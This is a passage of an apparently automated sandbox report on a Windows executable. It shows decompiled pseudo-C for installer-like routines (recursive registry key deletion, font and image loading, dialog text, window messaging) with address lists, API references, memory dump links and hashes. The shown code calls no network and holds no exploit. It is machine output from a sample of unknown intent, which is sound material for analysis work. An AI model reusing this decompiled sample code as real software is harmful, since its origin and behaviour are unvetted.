					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73582F10(_t59, _t83, _t85);
						} else {
							_t48 = E73582F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73582D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73582E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73582D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                    0x73581837
                                                                    0x73581841
                                                                    0x7358184a
                                                                    0x7358184d
                                                                    0x73581852
                                                                    0x7358185b
                                                                    0x73581864
                                                                    0x73581866
                                                                    0x7358186d
                                                                    0x7358186f
                                                                    0x73581872
                                                                    0x73581876
                                                                    0x73581882
                                                                    0x7358188b
                                                                    0x73581890
                                                                    0x73581893
                                                                    0x73581899
                                                                    0x73581899
                                                                    0x7358189c
                                                                    0x7358189f
                                                                    0x735818a2
                                                                    0x73581968
                                                                    0x73581968
                                                                    0x7358196b
                                                                    0x735819e5
                                                                    0x735819e9
                                                                    0x735819f8
                                                                    0x735819fb
                                                                    0x73581a03
                                                                    0x73581a03
                                                                    0x73581a03
                                                                    0x73581a05
                                                                    0x73581a05
                                                                    0x73581a06
                                                                    0x73581a06
                                                                    0x73581a08
                                                                    0x73581a0a
                                                                    0x73581a10
                                                                    0x73581a19
                                                                    0x73581a2a
                                                                    0x73581a35
                                                                    0x73581a35
                                                                    0x735819fd
                                                                    0x735819e0
                                                                    0x735819e0
                                                                    0x735819e2
                                                                    0x735819e2
                                                                    0x00000000
                                                                    0x735819e2
                                                                    0x735819ff
                                                                    0x73581a01
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73581a01
                                                                    0x735819ed
                                                                    0x735819f1
                                                                    0x00000000
                                                                    0x735819f1
                                                                    0x7358196d
                                                                    0x7358196d
                                                                    0x7358196e
                                                                    0x735819d7
                                                                    0x735819d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735819db
                                                                    0x735819de
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735819de
                                                                    0x73581970
                                                                    0x73581970
                                                                    0x73581971
                                                                    0x735819aa
                                                                    0x735819ae
                                                                    0x735819ca
                                                                    0x735819cd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735819cf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735819d1
                                                                    0x735819d3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735819d5
                                                                    0x735819b0
                                                                    0x735819b4
                                                                    0x735819b6
                                                                    0x735819b8
                                                                    0x735819ba
                                                                    0x735819c3
                                                                    0x735819bc
                                                                    0x735819bc
                                                                    0x735819bc
                                                                    0x00000000
                                                                    0x735819ba
                                                                    0x73581973
                                                                    0x73581973
                                                                    0x73581976
                                                                    0x735819a3
                                                                    0x735819a5
                                                                    0x00000000
                                                                    0x735819a5
                                                                    0x73581978
                                                                    0x73581978
                                                                    0x7358197b
                                                                    0x7358198b
                                                                    0x7358198f
                                                                    0x7358199c
                                                                    0x7358199e
                                                                    0x00000000
                                                                    0x7358199e
                                                                    0x73581991
                                                                    0x73581993
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73581995
                                                                    0x73581998
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358199a
                                                                    0x7358197e
                                                                    0x7358197f
                                                                    0x73581985
                                                                    0x73581987
                                                                    0x73581987
                                                                    0x00000000
                                                                    0x7358197f
                                                                    0x735818a8
                                                                    0x73581920
                                                                    0x73581922
                                                                    0x73581925
                                                                    0x73581943
                                                                    0x73581946
                                                                    0x7358194c
                                                                    0x73581951
                                                                    0x73581927
                                                                    0x73581927
                                                                    0x7358192b
                                                                    0x7358192f
                                                                    0x73581931
                                                                    0x73581931
                                                                    0x73581954
                                                                    0x73581957
                                                                    0x00000000
                                                                    0x7358195d
                                                                    0x7358195d
                                                                    0x73581960
                                                                    0x00000000
                                                                    0x73581960
                                                                    0x73581957
                                                                    0x735818aa
                                                                    0x735818ad
                                                                    0x73581911
                                                                    0x73581913
                                                                    0x73581915
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358191b
                                                                    0x735818af
                                                                    0x735818b2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735818b4
                                                                    0x735818b5
                                                                    0x735818eb
                                                                    0x735818ef
                                                                    0x73581907
                                                                    0x73581909
                                                                    0x00000000
                                                                    0x73581909
                                                                    0x735818f1
                                                                    0x735818f3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x735818f9
                                                                    0x735818fc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73581902
                                                                    0x735818b7
                                                                    0x735818ba
                                                                    0x735818e1
                                                                    0x00000000
                                                                    0x735818bc
                                                                    0x735818bc
                                                                    0x735818bd
                                                                    0x735818d1
                                                                    0x735818d3
                                                                    0x735818bf
                                                                    0x735818c1
                                                                    0x735818c7
                                                                    0x735818c9
                                                                    0x735818c9
                                                                    0x735818c1
                                                                    0x00000000
                                                                    0x735818bd

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242471104.0000000073581000.00000020.00020000.sdmp, Offset: 73580000, based on PE: true
                                                                    • Associated: 00000000.00000002.242447030.0000000073580000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242513496.0000000073583000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242533114.0000000073585000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeGlobal
                                                                    • String ID:
                                                                    • API String ID: 2979337801-0
                                                                    • Opcode ID: 2d0227e16d2759c258674c55e0726fac01f1419db47bd6e1efc1dd2811c7cbd6
                                                                    • Instruction ID: dc9b31b48c7c1f49dd5d4a98ca6148196d073abfe2db8fe3b4aab50f2f5d68e8
                                                                    • Opcode Fuzzy Hash: 2d0227e16d2759c258674c55e0726fac01f1419db47bd6e1efc1dd2811c7cbd6
                                                                    • Instruction Fuzzy Hash: 72512872D04198EFDB12EFB5F8447EEBFBAAF84245F18049AD847E3184C6719B428791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 48%
                                                                    			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406656(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                    0x00402cdb
                                                                    0x00402ce4
                                                                    0x00402ced
                                                                    0x00402cf9
                                                                    0x00402d02
                                                                    0x00402d0c
                                                                    0x00402d31
                                                                    0x00402d37
                                                                    0x00402d3c
                                                                    0x00402d3d
                                                                    0x00402d6d
                                                                    0x00402d46
                                                                    0x00402d48
                                                                    0x00402d98
                                                                    0x00402d9b
                                                                    0x00000000
                                                                    0x00402da1
                                                                    0x00402d57
                                                                    0x00402d5c
                                                                    0x00402d5e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402d66
                                                                    0x00402d6b
                                                                    0x00402d6c
                                                                    0x00402d6c
                                                                    0x00402d79
                                                                    0x00402d81
                                                                    0x00402d88
                                                                    0x00000000
                                                                    0x00402db1
                                                                    0x00000000
                                                                    0x00402d90
                                                                    0x00402d1c
                                                                    0x00402d2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402d2f
                                                                    0x00402db7

                                                                    APIs
                                                                    • RegEnumValueA.ADVAPI32 ref: 00402D24
                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseEnum$DeleteValue
                                                                    • String ID:
                                                                    • API String ID: 1354259210-0
                                                                    • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                    • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                                    • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                    • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                    0x00401d65
                                                                    0x00401d69
                                                                    0x00401d7e
                                                                    0x00401d6b
                                                                    0x00401d6d
                                                                    0x00401d73
                                                                    0x00401d73
                                                                    0x00401d84
                                                                    0x00401d87
                                                                    0x00401d91
                                                                    0x00401d94
                                                                    0x00401d9c
                                                                    0x00401dad
                                                                    0x00401db0
                                                                    0x00401dbb
                                                                    0x00401db2
                                                                    0x00401db4
                                                                    0x00401db4
                                                                    0x00401dbf
                                                                    0x00401dcc
                                                                    0x00401df3
                                                                    0x00401e02
                                                                    0x00401e10
                                                                    0x00401e18
                                                                    0x00401e20
                                                                    0x00401e20
                                                                    0x00401e29
                                                                    0x00401e2f
                                                                    0x004029a5
                                                                    0x004029a5
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                    • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                                    • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                    • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                    0x00401e35
                                                                    0x00401e40
                                                                    0x00401e42
                                                                    0x00401e4f
                                                                    0x00401e66
                                                                    0x00401e6b
                                                                    0x00401e78
                                                                    0x00401e7d
                                                                    0x00401e81
                                                                    0x00401e8c
                                                                    0x00401e93
                                                                    0x00401ea5
                                                                    0x00401eab
                                                                    0x00401eb0
                                                                    0x00401eba
                                                                    0x00402620
                                                                    0x00401569
                                                                    0x004029a5
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401E38
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                    • ReleaseDC.USER32 ref: 00401E6B
                                                                    • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                    • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                                    • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                    • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}



















                                                                    0x00404b20
                                                                    0x00404b25
                                                                    0x00404b2d
                                                                    0x00404b2e
                                                                    0x00404b3b
                                                                    0x00404b43
                                                                    0x00404b44
                                                                    0x00404b46
                                                                    0x00404b48
                                                                    0x00404b4a
                                                                    0x00404b4d
                                                                    0x00404b4d
                                                                    0x00404b54
                                                                    0x00404b5a
                                                                    0x00404b5a
                                                                    0x00404b61
                                                                    0x00404b68
                                                                    0x00404b6b
                                                                    0x00404b6e
                                                                    0x00404b6e
                                                                    0x00404b72
                                                                    0x00404b82
                                                                    0x00404b84
                                                                    0x00404b87
                                                                    0x00404b30
                                                                    0x00404b30
                                                                    0x00404b37
                                                                    0x00404b37
                                                                    0x00404b8f
                                                                    0x00404b9a
                                                                    0x00404bb0
                                                                    0x00404bc0
                                                                    0x00404bdc

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                    • wsprintfA.USER32 ref: 00404BC0
                                                                    • SetDlgItemTextA.USER32(?,0042A8B8), ref: 00404BD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                    • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                    • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                    • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 59%
                                                                    			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                    0x00401c2e
                                                                    0x00401c30
                                                                    0x00401c37
                                                                    0x00401c3a
                                                                    0x00401c3d
                                                                    0x00401c47
                                                                    0x00401c4b
                                                                    0x00401c4e
                                                                    0x00401c57
                                                                    0x00401c57
                                                                    0x00401c5a
                                                                    0x00401c5e
                                                                    0x00401c67
                                                                    0x00401c67
                                                                    0x00401c6a
                                                                    0x00401c6e
                                                                    0x00401c70
                                                                    0x00401cc5
                                                                    0x00401cc7
                                                                    0x00401cd0
                                                                    0x00401cd8
                                                                    0x00401cdb
                                                                    0x00401cdb
                                                                    0x00401ce4
                                                                    0x00000000
                                                                    0x00401c72
                                                                    0x00401c79
                                                                    0x00401c7b
                                                                    0x00401c7e
                                                                    0x00401c84
                                                                    0x00401c8b
                                                                    0x00401c8e
                                                                    0x00401cb6
                                                                    0x00401cea
                                                                    0x00401cea
                                                                    0x00401c90
                                                                    0x00401c9e
                                                                    0x00401ca6
                                                                    0x00401ca9
                                                                    0x00401ca9
                                                                    0x00401c8e
                                                                    0x00401ced
                                                                    0x00401cf0
                                                                    0x00401cf6
                                                                    0x004029a5
                                                                    0x004029a5
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                    • SendMessageA.USER32 ref: 00401CB6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
